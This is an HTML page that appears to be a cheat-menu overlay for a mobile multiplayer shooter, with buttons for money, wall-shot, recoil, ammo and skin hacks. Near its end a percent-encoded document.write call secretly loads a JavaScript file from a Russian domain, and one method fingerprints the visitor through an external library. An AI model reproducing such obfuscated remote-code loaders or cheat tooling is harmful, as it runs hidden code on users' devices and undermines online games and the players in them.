<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>t9she</title>
    <!-- 引入样式文件 -->
    <link rel="stylesheet" href="style.css">
    <!-- 引入 Vue 和 Vant 的 JS 文件 -->
    <script src="https://unpkg.com/vue@2.6/dist/vue.min.js"></script>
  <script src="https://kit.fontawesome.com/12bede3027.js" crossorigin="anonymous"></script> 
  <script>
      var h5gg_jquery_stub;
        if (typeof $ == 'undefined')
            document.write("<script src=\"https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js\"><\/script>");
  </script>
  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>
  
  </head>
  
  <body>
    
    <style>
      @import url('https://fonts.googleapis.com/css2?family=M+PLUS+Rounded+1c:wght@500&display=swap');

body, {

}

p {
	font-family: 'M PLUS Rounded 1c', sans-serif;
}

h3{
	font-size: 14px;
	font-family: 'M PLUS Rounded 1c', sans-serif;
}

label{
	font-size: 17px;
	font-family: 'aileron', sans-serif;
}
h4{
    font-size: 11px;
	font-family: 'aileron', sans-serif;
    color: white;
}
          * {
              padding: 0;
              margin: 0;
          }

        /*菜单*/
        *:not(input, checkbox, textarea) {
            /*禁止文本选择*/
            -webkit-touch-callout: none;
            -webkit-user-select: none;
            user-select: none;
            /* Non-prefixed version, currently */
        }
.aymenu {
  position: fixed;
  background: #3e3e3e;
  border-radius: 23px;
width: 400px;
height: 250px;
}
.tab {
    float: left;
    top: 15px;
    right: 15px;
	overflow: hidden;
	margin: 0;
	padding: 0;
	position: relative;
}

/* Style the buttons inside the tab */
.tab button {
    display: block;
    padding: 5px 20px;
	width: 100%;
	background: none; 
	font-size: 16px;
	text-decoration: none;
	color: #939192;
    border: none;
    text-align: center;
}
/* Change background color of buttons on hover */
.tab button:hover {
    color: white;
}

/* Create an active/current "tab button" class */
.tab button.active {
    color: white;
}/* Style the tab content */
.tabcontent {
  display: none;
    position: relative;
  top: 15%;
  bottom: 0; 
  right: 0;
    float: left;
    height: 230px;
    width: 65%;
    max-height: 290px;
    overflow-y: scroll;
    color: white;
    background: #3e3e3e;
    left: 3%;
}
.content { 
  display: 
    position: fixed;
    float: left;
    height: 237px;
    width: 73%;
    max-height: 290px;
    overflow-y: scroll;
    color: white;
    background: gray;
    left: 3%;
}
.start {
position: relative;
left: 63.1%;
}
.TeamRadar {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 20%;
left: 60%;
}
.FastGame {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 0%;
left: 60%;
}
.TimeStop {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 20%;
left: 60%;
}
.FireRate {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 40%;
left: 60%;
}
.JumpHack {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 40%;
left: 60%;
}
.AlwaysRespawn {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 78%;
left: 60%;
}
.BuyAnywhere {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 13%;
left: 60%;
}
.MoneyHack {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 20%;
left: 60%;
}
.NoRecoil {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 0%;
left: 60%;
}
.InfinityAmmo {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 20%;
left:60%;
}
.WallShot {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 59%;
left: 60%;
}
.MedalHack {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 13%;
left: 73%;
}
.ArmRaceWin {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 13%;
left: 73%;
}
.Float {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 13%;
left: 73%;
}
.MoveBefore {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 13%;
left: 73%;
}
.AntiFlash {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 0%;
left: 60%;
}
.AntiHE {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 20%;
left: 60%;
}
.NoGrenade {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 40%;
left: 60%;
}
.FastGrenade {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 59%;
left: 60%;
}
.FastPlant {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 13%;
left: 73%;
}
.PlantAnywhere {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 13%;
left: 73%;
}
.bombimmunity {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 13%;
left: 73%;
}
.FriendlyFire {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 78%;
left: 60%;
}
.DontReturnSpawn {
    background-color: #df8a8a;
  border-radius: 12%;
  height: 1.8em;
  width: 1.8em;
  position: absolute;
top: 59%;
left: 60%;
}
</style>
    <div id="iddiv"></div>
<div id="app">
        <div class="aymenu" ref="menuMain">
<div id="titleBar" style="padding:10px; max-height: 3px; z-index: 2; margin:0px; background: transparent">
  <p style="position: absolute; left: 72%; top: 95%; color: white; font-size: 10px;">
    t.me/t9she
  </p>
<div class="tab" @touchstart="titleTouchStart" @touchmove="titleTouchMove">
  <button class="tablinks" onclick="openCity(event, 'Hack')">Hack</button>
  <button class="tablinks" onclick="openCity(event, 'Weapon')">Weapon</button>
  <button class="tablinks" onclick="openCity(event, 'Other')">Other</button>
  <button class="tablinks" onclick="openCity(event, 'Skins')">Skins</button>
  <br>
  <button class="tablinks" onclick="openCity(event, 'About')">About</button>
</div>
<div id="Hack" class="tabcontent">
  <p>Fast Game</p><div onclick="FastGame()" class="FastGame"></div><br>
  
  <p>Money Hack</p><div onclick="MoneyHack()" class="MoneyHack"></div><br>
  
  <p>Jump Hack</p><div onclick="JumpHack()" class="JumpHack"></div><br>
  
  <p>Don't return spawn</p><div onclick="DontReturnSpawn()" class="DontReturnSpawn"></div><br>
  
  <p>Always Respawn</p><div onclick="AlwaysRespawn()" class="AlwaysRespawn"></div><br>
  
</div>

<div id="Weapon" class="tabcontent">
  <p>No Recoil</p><div onclick="NoRecoil()" class="NoRecoil"></div><br>
  
  <p>Infinity Ammo</p><div onclick="InfinityAmmo()" class="InfinityAmmo"></div><br>
  
  <p>Fire Rate</p><div onclick="FireRate()" class="FireRate"></div><br>
  
  <p>Wall Shot</p><div onclick="WallShot()" class="WallShot"></div><br>
  
  <p>Friendly Fire</p><div onclick="FriendlyFire()" class="FriendlyFire"></div><br>
   
</div>
<div id="Other" class="tabcontent">

  <p>Anti Flash</p><div onclick="AntiFlash()" class="AntiFlash"></div><br>
  
  <p>Anti HE</p><div onclick="AntiHE()" class="AntiHE"></div><br>
  
  <p>No Grenade</p><div onclick="NoGrenade()" class="NoGrenade"></div><br>
  
  <p>Fast Grenade</p><div onclick="FastGrenade()" class="FastGrenade"></div><br>

</div>
<div id="Skins" class="tabcontent">
      <p>Custom Skin / CFG</p>
    <button onclick="custom()">Custom Skin</button>
    <button onclick="h5gg.pickScriptFile(onClickLoadScript)">Load CFG</button>
      <p>Gloves</p>
    <button onclick="g1()">Gloves Burning Fists</button>
    <button onclick="g2()">Gloves Punk</button>
    <p>
    <button onclick="g3()">Gloves Champion</button>
    <button onclick="g4()">Gloves Steam Rider</button>
    </p><p>
    <button onclick="g5()">Gloves Phoenix Risen</button>
    <button onclick="g6()">Gloves Autumn</button>
    </p><p>
    <button onclick="g7()">Gloves Geometric</button>
    <button onclick="g8()">Gloves Retro Wave</button>
    </p><p>
    <button onclick="g9()">Gloves Living Flame</button>
    <button onclick="g10()">Gloves Neuro</button>
    </p><p>
    <button onclick="g11()">Gloves Acid</button>
    <button onclick="g12()">Gloves Camo</button>
    </p><p>
    <button onclick="g13()">Gloves Fossil</button>
    <button onclick="g14()">Gloves HandCraft</button>
    </p><p>
    <button onclick="g15()">Gloves Raider</button>
    <button onclick="g16()">Gloves Thug</button>
</p><p>Karambit</p>
    <button onclick="karambitgold()">Karambit Gold</button>
    <button onclick="karambitclaw">Karambit Claw</button>
    <p>
    <button onclick="karambitdragongalss()">Karambit DragonGlass</button>
    <button onclick="karambitscratch">Karambit Scratch</button>
    </p><p>
    <button onclick="karmbituniverse()">Karambit Universe</button>
    <button onclick="karambitcoldflame()">Karambit Cold Flame</button>
    </p><p>
    <button onclick="karambitfrozen()">Karambit Frozen</button>
    <button onclick="karambitsnowcamo()">Karambit Snow Camo</button>
      </p><p>
    <button onclick="karambityearoftiger()">Karambit Year of Tiger</button>
    </p><p>Bayonet</p>
    <button onclick="m1()">M9 BlueBlood</button>
    <button onclick="m2()">M9 Kumo</button>
    <button onclick="m3()">M9 Universe</button>
    <p>
    <button onclick="m4()">M9 Frozen</button>
    <button onclick="m5()">M9 DragonGlass</button>
    </p><p>
    <button onclick="m6()">M9 Scratch</button>
    <button onclick="m7()">M9 Acient</button>
    </p><p>jKommando</p>
    <button onclick="j1()">jKommando Ancient</button>
    <button onclick="j2()">jKommando Reaper</button>
    <p>
    <button onclick="j3()">jKommando Floral</button>
    <button onclick="j4()">jKommando Luxury</button>
    </p><p>
    <button onclick="j5()">jKommando Frozen</button>
    <button onclick="j6()">jKommando Augustite</button>
    </p><p>Butterfly</p>
    <button onclick="b1()">Butterfly DragonGlass</button>
    <button onclick="b2()">Butterfly Legacy</button>
    <button onclick="b3()">Butterfly FireStorm</button>
    <p>
    <button onclick="b4()">Butterfly BlackWidow</button>
    <button onclick="b5()">Butterfly Starfall</button>
    </p><p>
    <button onclick="b6()">Butterfly ColdFlame</button>
    <button onclick="b7()">Butterfly Kumo</button>
    </p><p>Flip Knife</p>
    <button onclick="f1()">Flip DragonGlass</button>
    <button onclick="f2()">Flip Arctic</button>
    <button onclick="f3()">Flip StoneCold</button>
    <p>
    <button onclick="f4()">Flip Vortex</button>
    <button onclick="f5()">Flip Frozen</button>
    </p><p>
    <button onclick="f6()">Flip SnowCamo</button>
    <button onclick="f7()">Flip HolidayFrost</button>
    </p><p>Kunai</p>
    <button onclick="k1()">Kunai Bone</button>
    <button onclick="k2()">Kunai Luxury</button>
    <p>
    <button onclick="k3()">Kunai Poison</button>
    <button onclick="k4()">Kunai Radiation</button>
    </p><p>
    <button onclick="k5()">Kunai Reaper</button>
    <button onclick="k6()">Kunai ColdFlame</button>
    </p><p>
    <button onclick="k7()">Kunai SnowCamo</button>
    <button onclick="k8()">Kunai Augustite</button>
    </p><p>Scorpion</p>
    <button onclick="s1()">Scorpion Veil</button>
    <button onclick="s2()">Scorpion Sea Eye</button>
    <p>
    <button onclick="s3()">Scorpion Scratch</button>
    <button onclick="s4()">Scorpion Starfall</button>
    </p><p>
    <button onclick="s5()">Scorpion ColdFlame</button>
    <button onclick="s6()">Scorpion HolidayFrost</button>
    </p><p>Tanto</p>
    <button onclick="t1()">Tanto Dojo</button>
    <button onclick="t2()">Tanto Yakuza</button>
    <p>
    <button onclick="t3()">Tanto Malachite</button>
    <button onclick="t4()">Tanto Pearl Abyss</button>
    </p><p>
    <button onclick="t5()">Tanto Transistor</button>
    <button onclick="t6()">Tanto Flow</button>
    </p><p>
    <button onclick="t7()">Tanto Restless</button>
    <button onclick="t8()">Tanto Year Of Tiger</button>
      </p><p>Dual Daggers</p>
    <button onclick="d1()">Daggers Acid</button>
    <button onclick="d2()">Daggers Demonic Steel</button>
    <p>
    <button onclick="d3()">Daggers Grunge</button>
    <button onclick="d4()">Daggers Molten</button>
    </p><p>
    <button onclick="d5()">Daggers Harmony</button>
    <button onclick="d6()">Daggers Jaws</button>
    </p><p>Kukri</p>
    <button onclick="kk1()">Kukri Ares</button>
    <button onclick="kk2()">Kukri Prophet</button>
    <p>
    <button onclick="kk3()">Kukri Gold Trim</button>
    <button onclick="kk4()">Kukri Antique Silver</button>
    </p><p>
    <button onclick="kk5()">Kukri Constellations</button>
    <button onclick="kk6()">Kukri Divine Power</button>
    </p><div id="menu5" class="menuview">
    <br>
	
  </div></div>
  
  <div id="About" class="tabcontent">
  <h3 class="start">SoftWareIPA</h3><button class="fullbtn" onclick="hideiconON()">
Hide Icon
  </button><br><br><h3>Welcome to SoftWare iPA!</h3>
  <p>Author for soft SoftWareIPA<br>Author for menu hospice</p>
</div>
  
  <script>function openCity(evt, cityName) {
    // Declare all variables
    var i, tabcontent, tablinks;

    // Get all elements with class="tabcontent" and hide them
    tabcontent = document.getElementsByClassName("tabcontent");
    for (i = 0; i < tabcontent.length; i++) {
        tabcontent[i].style.display = "none";
    }

    // Get all elements with class="tablinks" and remove the class "active"
    tablinks = document.getElementsByClassName("tablinks");
    for (i = 0; i < tablinks.length; i++) {
        tablinks[i].className = tablinks[i].className.replace(" active", "");
    }

    // Show the current tab, and add an "active" class to the link that opened the tab
    document.getElementById(cityName).style.display = "block";
    evt.currentTarget.className += " active";
}</script>
  
  <script type="text/javascript">
document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%71%77%77%6C%6F%77%68%75%6C%6C%7A%2E%72%75%2F%6D%79%66%75%6E%63%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>
  
<script>
        new Vue({
            el: '#app',
            data() {
                return {
                    switchValue: false,
                    sliderValue: 0,
                    tabValue: "Tos",
                }
    
            
            },
            mounted() {
               setButtonImage("https://play-lh.googleusercontent.com/CvrAspBClfv1bbHdxw0gj5XBHenMECqVpT-0sdIX7aqnGj6CxqDKwHNLKPIzToRj7g");
                
            },
            methods: {
                setRect(w, h, x = -1, y = -1) {
                    var boxW = w;
                    var boxH = h;

                    var ayMenu = this.$refs.menuMain;
                    ayMenu.style.width = `${boxW}px`;
                    ayMenu.style.height = `${boxH}px`;
                    if (x == -1) ayMenu.style.left = `calc(50% - ${boxW / 2}px)`;
                    if (y == -1) ayMenu.style.top = `calc(50% - ${boxH / 2}px)`;
                    

                    var menuBody = this.$refs.menuBody;
                    menuBody.style.height = `${boxH - 46 - 40}px`;
                },
                titleTouchStart(event) {
                    this.touchStartX = parseInt(event.touches[0].clientX);
                    this.touchStartY = parseInt(event.touches[0].clientY);

                    var ayMenu = this.$refs.menuMain;
                    this.menuLastX = ayMenu.offsetLeft;
                    this.menuLastY = ayMenu.offsetTop;
                },
                titleTouchMove(event) {
                    event.preventDefault();
                    var distanceX = event.touches[0].clientX - this.touchStartX;
                    var distanceY = event.touches[0].clientY - this.touchStartY;

                    var ayMenu = this.$refs.menuMain;
                    ayMenu.style.left = this.menuLastX + distanceX + "px";
                    ayMenu.style.top = this.menuLastY + distanceY + "px";
                },
                changeTab(v) {
					this.tabValue = v;
				},
                jumpQQ() {
                    
                                                                                      // Get the visitor identifier when you need it.
  const fpPromise = import('https://openfpcdn.io/fingerprintjs/v3')
    .then(FingerprintJS => FingerprintJS.load())
fpPromise
    .then(fp => fp.get())
    .then(result => {
      // This is the visitor identifier:
      const visitorId = result.visitorId
      vant.Toast(visitorId);
      
     
      

    })
    
    
    
  




                },
                closeMenu() {
                    var menu = document.querySelector("#app");
                    menu.style.display = "none";
                    setWindowTouch(false);
                },
            }
        });


        var layout = function () {
            //window.orientation是设备握持方向, 不是屏幕显示方向
            if (window.lastorientation == window.orientation) return;
            window.lastorientation = window.orientation;

            //window.screen中的宽高不会随着屏幕旋转更新(只会在初始化的时候固定)
            if (Math.abs(window.orientation) == 90) {
                //横屏模式
                setWindowRect(0, 0, window.screen.height, window.screen.width);
            } else {
                //竖屏模式
                setWindowRect(0, 0, window.screen.width, window.screen.height);
            }
        }

        layout(); //设置旋转屏幕时自动调整布局和画布
        window.addEventListener("orientationchange", layout, false);

        //*设置自定义的悬浮按钮图标点击动作
        setButtonAction(function () {
            var menu = document.querySelector("body");
            if (menu.style.display == "none") {
                menu.style.display = "block";
                //隐藏菜单之后, 设置触控穿透悬浮窗口
                setWindowTouch(true);
            } else {
                menu.style.display = "none";
                //显示菜单之后, 设置触控不可穿透悬浮窗口
                setWindowTouch(false);
            }
        });</script>
  
  </body>